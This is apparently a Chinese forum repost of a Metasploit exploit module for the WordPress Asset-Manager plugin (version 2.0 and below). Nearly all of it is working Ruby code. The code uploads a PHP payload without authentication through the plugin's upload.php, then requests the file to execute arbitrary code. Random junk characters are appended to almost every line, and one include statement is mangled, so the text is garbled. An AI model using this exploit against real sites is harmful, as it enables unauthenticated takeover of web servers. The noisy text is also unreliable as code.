这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。0 p F- I/ ^+ ?
" d8 S$ E$ g, p: |( [
##: h5 \) b M T- _3 i
# This file is part of the Metasploit Framework and may be subject to& ]: m8 A1 y2 u* A+ s" B
# redistribution and commercial restrictions. Please see the Metasploit& e3 C3 t( k: [; q+ m5 N
# Framework web site for more information on licensing and terms of use.+ o: q+ E4 v$ i! i! G! [ h7 m
# http://metasploit.com/framework/
5 R! z8 F: N6 X: g% E# d##5 U! _1 A n5 E0 x& D4 t
+ B8 g: C$ R" j4 M. ?9 Z5 Jrequire 'msf/core'8 d1 L; \) r7 n8 Q [$ F! T* q
require 'msf/core/exploit/php_exe'+ S& G/ R- \: ^1 A
* Z! V5 {7 O3 C1 G, K, Qclass Metasploit3 < Msf::Exploit::Remote' N& X8 n6 H. v; k. L; h9 X
Rank = ExcellentRanking
2 E+ o. @% p" X j ) Y3 ?: w# w2 t* @) n- l
include Msf::Exploit::Remote::HttpClient* j. L$ _: Z: M6 N, _8 |" ^
include Msf::Exploit: hpEXE
) y8 Q! i# T2 G7 o- ^; { / O' t- O1 A8 W- h/ [4 E
def initialize(info = {})8 V) i* y" E" w" b
super(update_info(info,
z2 y `4 O' q: L 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
6 o# Y3 m6 @$ I* V8 T0 ~0 ~ 'Description' => %q{& M L$ M* o0 Z+ m2 |( v# M) }0 U0 O% I
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
2 C/ F( P4 }, i: b4 K( I plugin. By abusing the upload.php file, a malicious user can upload a file to a2 \0 O: K, |: R d9 [2 x, I0 o9 w
temp directory without authentication, which results in arbitrary code execution.% f1 G9 G; ]% i6 O6 d: | @
},
* A! o4 n. X( w# L) m5 Q' M- G 'Author' =>3 K# c+ `7 L' ~* L f0 T3 h& T1 n8 e
[
1 o. \- p0 R: Q4 J; \ 'Sammy FORGIT', # initial discovery
) z4 ]9 R; p& E5 F 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
$ ~' c$ Z6 ?( g' p" q. @! W/ M ],! @- v G0 ^4 b4 @/ G+ Z6 ?
'License' => MSF_LICENSE, t; N( s7 w$ b, _
'References' =>7 C$ x5 I/ L C- V
[
% E; @9 |3 E4 Y* H [ 'OSVDB', '82653' ],) @. B. P$ C9 y; T" u: c V5 L
[ 'BID', '53809' ],
7 |- ?% }: C( `: h [ 'EDB', '18993' ],, I. [+ d* \- i# S; D
[ 'URL', 'http:// www.myhack58.com /' ]8 i$ H7 K# Z' q( I. O1 {9 S0 K
],
! Q- T5 k' B9 P1 A4 t0 e; V 'Payload' =>; Z( V6 p) u* O: e
{
8 S3 ]2 z4 m$ d8 I 'BadChars' => "\x00",
% {/ d5 i0 q( w, z ~4 A g },# {+ v2 Y8 e o5 O( ~" P
'Platform' => 'php',
7 l$ P4 M$ N. f, f$ y) l 'Arch' => ARCH_PHP,
7 ?- d6 o3 U0 t9 @: j* G 'Targets' =>2 g6 ~& L5 K& y: f" @0 ]8 l
[8 i7 d, i& K0 w3 x& f
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 n* z! a/ f' W* j* A a. i [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]7 \" e6 r$ I9 y% j2 R/ d$ P
],7 {. F# |" z8 h+ P% i/ {( w
'DefaultTarget' => 0,! v1 M. H% L' k4 t; @, X7 C
'DisclosureDate' => 'May 26 2012'))
2 P! U) I% q W3 _9 D: N4 r% y4 R
# H; j! L& Q3 ?0 n% F# B register_options(
+ W3 e, d) o! W# y' ` [
( t: t0 |- z+ J2 u9 V OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
/ `; E* M6 ?: r ], self.class)
/ _% e- Z8 I- s8 U$ s- j& m end
+ N- v3 ?. P9 M8 }" k
" W' c, a' C' ~, U# l" ~ def exploit
5 |$ r/ x. q) k3 h0 J7 \ uri = target_uri.path
& w# ^$ a6 p# a- K4 |' m uri << '/' if uri[-1,1] != '/'* @/ ^6 R% K: {+ }6 C+ J% e9 {
peer = "#{rhost}:#{rport}"
; @! r* |3 j2 k u: p payload_name = "#{rand_text_alpha(5)}.php"+ F2 Q+ U; O3 T0 R
php_payload = get_write_exec_payload(:unlink_self=>true)
( W3 e1 J' M7 r$ @7 q ' Y. J0 n. c& _1 V* J: k3 |/ k4 [
data = Rex::MIME::Message.new, p, o+ q7 v7 ]6 M! `# M& `
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
4 w' Q7 A& X+ ^& R post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 R x e$ H' |) c% G) m1 i& ?! x % z5 L2 u8 `, N+ F8 I, }
print_status("#{peer} - Uploading payload #{payload_name}")- D6 Q* C) Y& Z: C
res = send_request_cgi({
, m, y; |4 n2 B3 f/ T 'method' => 'POST',6 ^' V2 W$ v# T4 C' q& C' L
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
. {" t5 P$ r7 T! L 'ctype' => "multipart/form-data; boundary=#{data.bound}",
( v$ Q p" m$ \; V3 c 'data' => post_data R3 S) ^% b) c
})
- N0 d( V# I+ r; H$ y
( `, q7 y3 T/ j0 l8 T2 ] if not res or res.code != 200 or res.body !~ /#{payload_name}/0 Q3 }% A- _+ i2 V' s- a
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ u6 D- Q4 j( r6 x3 e
end% q& \: T& W% T6 {' B# F
& V: k/ | P$ _) |# Z, Z print_status("#{peer} - Executing payload #{payload_name}")1 C; g R$ Q4 m8 u' X
res = send_request_raw({2 y( M* [" \3 C$ d6 t; N
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",5 M& C2 w) h! B6 r0 {, u, C! U
'method' => 'GET'
/ B' D" L. B8 n. T+ N4 [: G6 e' a }); D, z0 {( a+ Z8 A' v
1 b6 s0 V% _' l3 a' T+ M1 |' }- U
if res and res.code != 200/ L$ ~4 r' }# L. j0 m
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! e! y) b+ l5 }% g9 j
end Y, h6 o [, f w' Q
end0 d$ w& x2 F) J& L& j9 I) {- Q
end* U9 q0 x- |# {$ s
|